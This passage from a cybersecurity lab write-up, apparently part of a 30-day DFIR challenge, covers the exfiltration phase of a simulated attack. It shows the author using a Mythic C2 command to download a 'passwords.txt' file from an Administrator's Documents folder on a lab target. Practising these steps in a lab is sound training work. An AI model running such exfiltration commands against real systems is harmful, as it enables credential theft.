jforrest602/projects/MYDFIR_30Day_Challenge_Part5.md

 #### Phase 6: Exfiltration
 Now that C2 has been established, I have the ability to execute commands on the target machine from my Mythic web GUI.
 <img width="962" alt="day21-10b" src="https://github.com/user-attachments/assets/b0dc3abc-43a8-4d8b-88b0-25ef6cc91cb2" />

+The goal of this final phase is to steal sensitive data from the compromised target and transfer it to the attacker-controlled infrastructure.

 To download a file from the target machine, run `download file path`.
 To download the `passwords.txt` file that was created, I ran `download C:\Users\Administrator\Documents\passwords.txt`.
 I can even see a preview of the documents data.
 <img width="958" alt="day21-10c" src="https://github.com/user-attachments/assets/b7a2f719-02dd-460f-9efa-6f782b4f23f6" />